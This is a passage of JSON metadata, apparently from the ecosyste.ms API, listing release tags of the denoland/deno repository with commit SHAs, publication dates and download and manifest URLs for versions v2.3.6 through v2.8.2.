itHub/repositories/denoland%2Fdeno/tags/v2.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3/manifests"},{"name":"v2.8.2","sha":"085be0b5ff8ca3ccfe58318afe0939c4d4af9743","kind":"commit","published_at":"2026-06-03T11:51:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2/manifests"},{"name":"v2.8.1","sha":"3e2030bc01776ce6b4ca355b1e78c4cb98c82dca","kind":"commit","published_at":"2026-05-27T10:23:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"fbb5be31ac23ef40f51025d6aeaaa91d9f082e4a","kind":"commit","published_at":"2026-05-22T08:06:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0/manifests"},{"name":"v2.7.14","sha":"2d674b25625bcc367853d00fe86f6e84390f88cb","kind":"commit","published_at":"2026-04-28T12:41:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14/manifests"},{"name":"v2.7.13","sha":"eea91269eb83ff8065afe2e424c8fe78c4b1f448","kind":"commit","published_at":"2026-04-22T11:22:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13/manifests"},{"name":"v2.7.12","sha":"825d2647dd0728723623623b6c7b00da7ddad10d","kind":"commit","published_at":"2026-04-09T18:18:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12/manifests"},{"name":"v2.7.11","sha":"6ddbb099662ea78a62af79484ae773cd9058c815","kind":"commit","published_at":"2026-04-01T09:31:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11/manifests"},{"name":"v2.7.10","sha":"fde6c9c11a5ae8e0dc85f8737b34be11d2aaef32","kind":"commit","published_at":"2026-03-31T12:34:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10/manifests"},{"name":"v2.7.9","sha":"f065b072ab052602746b4be8da37ad90e51aee70","kind":"commit","published_at":"2026-03-27T10:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9/manifests"},{"name":"v2.7.8","sha":"c394911f8edc7591de8da65c7b6690bcbc78afc1","kind":"commit","published_at":"2026-03-25T14:14:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8/manifests"},{"name":"v2.7.7","sha":"8fa9085f90849222bd56facddc16ac288c8ee62e","kind":"commit","published_at":"2026-03-19T11:52:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7/manifests"},{"name":"v2.7.6","sha":"ffbaf13c354a6433a66c2335ab16c4567d357be6","kind":"commit","published_at":"2026-03-18T10:27:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6/manifests"},{"name":"v2.7.5","sha":"0238181e8a95be0885da93bbc99997988d07bff0","kind":"commit","published_at":"2026-03-11T09:51:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5/manifests"},{"name":"v2.7.4","sha":"8274bf758236405d50046dbe31beba96b6d3d2f6","kind":"commit","published_at":"2026-03-05T12:10:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4/manifests"},{"name":"v2.7.3","sha":"e78a7fa8d86848a759e6743537cf90013c7160b1","kind":"commit","published_at":"2026-03-04T14:23:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3/manifests"},{"name":"v2.7.2","sha":"83e374686079a2f067115e60ad91ec38f4f6118b","kind":"commit","published_at":"2026-03-03T14:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2/manifests"},{"name":"v2.7.1","sha":"1df618d969894353731981a17784816167ad82fb","kind":"commit","published_at":"2026-02-25T15:42:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"fb4db333c37ec1242a6f80738510d214018fea53","kind":"commit","published_at":"2026-02-25T09:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0/manifests"},{"name":"v2.6.10","sha":"8871ade7aa09eb907a04ee61a427f5ba14c54014","kind":"commit","published_at":"2026-02-17T14:05:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10/manifests"},{"name":"v2.6.9","sha":"7a9888857e01c02417fd38144d4bf0ace73eb6ab","kind":"commit","published_at":"2026-02-10T14:53:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9/manifests"},{"name":"v2.6.8","sha":"7ab62a769be154c0926fe8be640d48674eb79614","kind":"commit","published_at":"2026-02-02T13:42:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8/manifests"},{"name":"v2.6.7","sha":"d155af667f0e57277dc992d1b9609d5e6712908d","kind":"commit","published_at":"2026-01-29T11:26:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7/manifests"},{"name":"v2.5.7","sha":"8533c169419c6c92069cb5981a73ee9c36d19798","kind":"commit","published_at":"2026-01-27T16:21:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7/manifests"},{"name":"v2.6.6","sha":"b9b87a6bfb61a5d8855ee1578620ac3a9393b6bb","kind":"commit","published_at":"2026-01-22T19:37:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6/manifests"},{"name":"v2.6.5","sha":"c356d9a621fccad5047497238039cde10613b278","kind":"commit","published_at":"2026-01-15T11:11:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5/manifests"},{"name":"v2.6.4","sha":"658638b3262a90c3e92fe96887fd898b5b1a78d7","kind":"commit","published_at":"2026-01-05T16:18:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4/manifests"},{"name":"v2.6.3","sha":"3fbb1daddbc9333cddf0d8c0735811717dd70f7a","kind":"commit","published_at":"2025-12-20T11:07:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"9cd8077757a365f2e9e36499c2330d2d4facbb2e","kind":"commit","published_at":"2025-12-19T14:04:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"1ba09320aa4ef7362ec33ec332e6e6d38c75d2b5","kind":"commit","published_at":"2025-12-15T16:45:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"d5b1548eba893d4cc26305f33739a6ca2e6e8c11","kind":"commit","published_at":"2025-12-10T13:29:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0/manifests"},{"name":"v2.5.6","sha":"1b5f3112af364a3327b26f720746819c4f20f20d","kind":"commit","published_at":"2025-10-29T23:50:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6/manifests"},{"name":"v2.5.5","sha":"367ecdd0360e935de0454c70e0018be61c02904e","kind":"commit","published_at":"2025-10-28T16:40:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5/manifests"},{"name":"v2.5.4","sha":"6fbce91e40cc07fc6da74068e5cc56fdd40f7b4c","kind":"commit","published_at":"2025-10-09T09:41:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4/manifests"},{"name":"v2.5.3","sha":"1c3d04cfaf50a4a0db7a1925c0a73af5ea89bc69","kind":"commit","published_at":"2025-10-03T02:05:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3/manifests"},{"name":"v2.2.15","sha":"5f6b1329dfd377ff03a389fb32faf73bb966e81d","kind":"commit","published_at":"2025-09-30T18:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.15","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15/manifests"},{"name":"v2.1.14","sha":"b8ae1323051c14a66a1c88434aa0f1e49f960c10","kind":"commit","published_at":"2025-09-29T15:06:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14/manifests"},{"name":"v2.5.2","sha":"02787156398518fdac51b1f633a8367f92a7d253","kind":"commit","published_at":"2025-09-24T19:42:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2/manifests"},{"name":"v2.5.1","sha":"4c1cdfc9a4f3c8919d25d1b2fe01981025babec5","kind":"commit","published_at":"2025-09-16T23:58:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"c6adba122836aeddd92800c45282897e1f508bd3","kind":"commit","published_at":"2025-09-10T05:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"b7061b0f64b3c79b312de5a59122b7184b2fdef2","kind":"commit","published_at":"2025-08-21T11:41:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5/manifests"},{"name":"v2.4.4","sha":"5129d036ebd51b229adb7579e2c805859e3f95c0","kind":"commit","published_at":"2025-08-13T20:26:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4/manifests"},{"name":"v2.4.3","sha":"5612d2edc7262d7bfb3bcfb0f18649b01ec94b53","kind":"commit","published_at":"2025-07-30T22:25:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"622c3513936c1614ee316516a31343729c3c4367","kind":"commit","published_at":"2025-07-16T10:51:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2/manifests"},{"name":"v2.2.14","sha":"ec5368efefd1fbdfe0c83a20237b5117d1291c11","kind":"commit","published_at":"2025-07-16T09:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14/manifests"},{"name":"v2.4.1","sha":"c03199ea1e4e22d44aad0deafc634be82e5b841b","kind":"commit","published_at":"2025-07-08T05:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"45dfae18eec45c91146231aa05f4b249378691b5","kind":"commit","published_at":"2025-07-01T20:21:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0/manifests"},{"name":"v2.3.7","sha":"0d76cd50af2b21e0ac772bb5219199e32a8f312d","kind":"commit","published_at":"2025-06-23T21:51:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7/manifests"},{"name":"v2.3.6","sha":"d2d8d3775fe0fbb34de08421f612ded43dea4473","kind":"commit","published_at":"2025-06-12T12:33:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2